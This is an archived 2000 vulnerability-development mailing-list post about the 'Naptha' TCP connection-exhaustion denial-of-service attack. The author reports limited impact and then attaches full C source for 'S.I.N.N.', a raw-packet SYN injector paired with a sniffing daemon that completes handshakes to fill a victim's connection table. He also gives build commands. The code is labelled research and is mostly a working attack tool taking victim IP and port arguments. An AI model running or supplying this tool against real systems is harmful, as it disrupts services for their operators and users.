Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Naptha - New DoS

From: Bruno Morisson <morisson () GENHEX ORG>
Date: Fri, 15 Dec 2000 17:36:20 +0000
  I was pretty much intrigued by the impact the attack described on
razor's advisory, so I coded a small program with libpcap and libnet
acording to their description (at least, my interpretation of their
description). I hardly got any similar results, what I was able to do
was basically fill up the the target machine with established
connections (old news), with basically zero impact on the attacker
machine. All OSs I tried (win98,NT4,freeBSD,Linux) recovered completely
after more or less time, ranging from seconds to 20 minutes.
The attack uses 2 processes, a packet injector which sends SYNs to the
victim machine, and a daemon which replies to SYN|ACK requests,
completing the three way handshake.
If anyone cares to research further this attack, the code is attached,
and is pretty simple. It will only work on your local network (script
kiddie spoiler), and it was not coded with spoofing in mind. Just drop
any inbound packets from the victim machine, so your stack won't send
any resets.


regards,
Bruno Morisson
--
Life's not original, everybody's got one.
/*  S.I.N.N. - Sinn Is Not Naphta
 *
 * By Bruno Morisson <morisson () genhex org>
 *       http://www.genhex.org
 *
 * DISCLAIMER:
 *  S.I.N.N. is a research DoS tool. It was coded based
 * on the very little info on a DoS attack described by
 * a BindView advisory, at
 * http://razor.bindview.com/publish/advisories/adv_NAPTHA.html
 *  This Software is provided AS IS, with NO WARRANTY,
 * WHATSOEVER! You use it at your own risk. I take no
 * responsability for whatever you use this for. It may
 * not work, it may destroy your computer, it may destroy
 * others' computers, it may put you in jail,
 * it may kill you, it may make your hair fall.
 * You have been warned. By using
 * this software you agree to use it ONLY for research
 * purposes, and on your own risk.
 *
 *
 * To compile:
 *  build the packet injector:
 *   cc `libnet-config --defines` -o sinn sinn.c `libnet-config --libs`
 *  then build the packet reply daemon:
 *   cc `libnet-config --defines` -D_DAEMON_ -o sinnd sinn.c -lpcap \
 *    `libnet-config --libs`
 *
 */

#include <pcap.h>
#include <libnet.h>
#include <signal.h>


int inject(int sock, u_long src_ip, u_long dst_ip,
           u_short src_prt, u_short dst_prt,u_long id,
           u_long seq, u_long ack, u_char flags) {

  int packet_size;
  u_char *packet;

  packet_size = LIBNET_IP_H + LIBNET_TCP_H;

  libnet_init_packet(packet_size, &packet);

  if(!packet)
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");

  libnet_build_ip(LIBNET_TCP_H, IPTOS_LOWDELAY,
            id, 0, 1, IPPROTO_TCP, src_ip, dst_ip,
            NULL, 0, packet);

    libnet_build_tcp(src_prt, dst_prt, seq, ack,
            flags, 512, 0, NULL, 0, packet + LIBNET_IP_H);


  libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H);
  libnet_write_ip(sock, packet, packet_size);
  libnet_destroy_packet(&packet);
}


#ifdef _DAEMON_
void pcap(char *iface,u_long source, u_long dest, u_short dport){

  int sock;
  struct pcap_pkthdr *hdr;
  char errbuf[PCAP_ERRBUF_SIZE];
  u_char *pacote;
  struct libnet_ip_hdr  *ip;
  struct libnet_tcp_hdr *tcp;
  pcap_t *descritor;
  u_long id, seq ,ack;
  u_short port;
  u_char flags;

  pacote= (u_char *)malloc(3000);
  hdr = (struct pcap_pkthdr *)malloc(sizeof(struct pcap_pkthdr));
  descritor = pcap_open_live(iface,1500,1,0,errbuf);

  if((sock = libnet_open_raw_sock(IPPROTO_RAW))==-1)
      libnet_error(LIBNET_ERR_FATAL, "Error opening socket.\n");

  do{
    pacote = (u_char *)pcap_next(descritor,hdr);
    if(pacote!=NULL) {
      ip=(struct libnet_ip_hdr *)(pacote+LIBNET_ETH_H);
      tcp=(struct libnet_tcp_hdr *)(pacote+LIBNET_IP_H+LIBNET_ETH_H);

      if((ip->ip_src.s_addr==dest)&&(tcp->th_sport==htons(dport))&&((tcp->th_flags==(TH_SYN|TH_ACK)))) {
       id=ntohl(ip->ip_id);
       seq=ntohl(tcp->th_ack);
       ack=ntohl(tcp->th_seq)+1;
       flags=TH_ACK;
       inject(sock,ip->ip_dst.s_addr,ip->ip_src.s_addr,
              ntohs(tcp->th_dport),ntohs(tcp->th_sport),
              id,seq,ack,flags);
      }
    }
  } while(1);
  free(hdr);

}



int main(int argc, char **argv) {

 u_long src_ip, dst_ip;
 u_short dst_prt;

 if(argc<5) {
  fprintf(stderr,"usage: %s <src ip> <victim ip> <victim port> <iface>\n",argv[0]);
  exit(-1);
 }


 src_ip=inet_addr(argv[1]);
 dst_ip=inet_addr(argv[2]);
 dst_prt=atoi(argv[3]);


 signal(SIGCHLD,SIG_IGN);
 close(STDIN_FILENO);
 close(STDOUT_FILENO);
 close(STDERR_FILENO);

 if(!fork())
   pcap(argv[4],src_ip,dst_ip, dst_prt);

 exit(0);
}


#else
int main(int argc, char **argv) {

 int sock;
 u_long src_ip, dst_ip;
 u_short src_prt, dst_prt;
 u_long id=666,seq=100,ack=0;
 u_long counter=0;
 int packets=0;
 pid_t pid;

 if(argc<6) {
  fprintf(stderr,"usage: %s <src ip> <src port> <victim ip> <victim port> <connections>\n",argv[0]);
  exit(-1);
 }

 src_ip=inet_addr(argv[1]);
 src_prt=atoi(argv[2]);
 dst_ip=inet_addr(argv[3]);
 dst_prt=atoi(argv[4]);
 packets=atoi(argv[5]);

 printf("Creating %d connections\n",packets);

 if((sock = libnet_open_raw_sock(IPPROTO_RAW))==-1)
   libnet_error(LIBNET_ERR_FATAL, "Error opening socket.\n");


 while(packets--) {
   inject(sock,src_ip,dst_ip,src_prt++,
     dst_prt,id++,seq++,0,TH_SYN);
   printf("%d ",counter++);
   fflush(stdout);
   sleep(1);
 }

 libnet_close_raw_sock(sock);
 sleep(2);
}
#endif

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

Previous By Date Next
Previous By Thread Next

Current thread: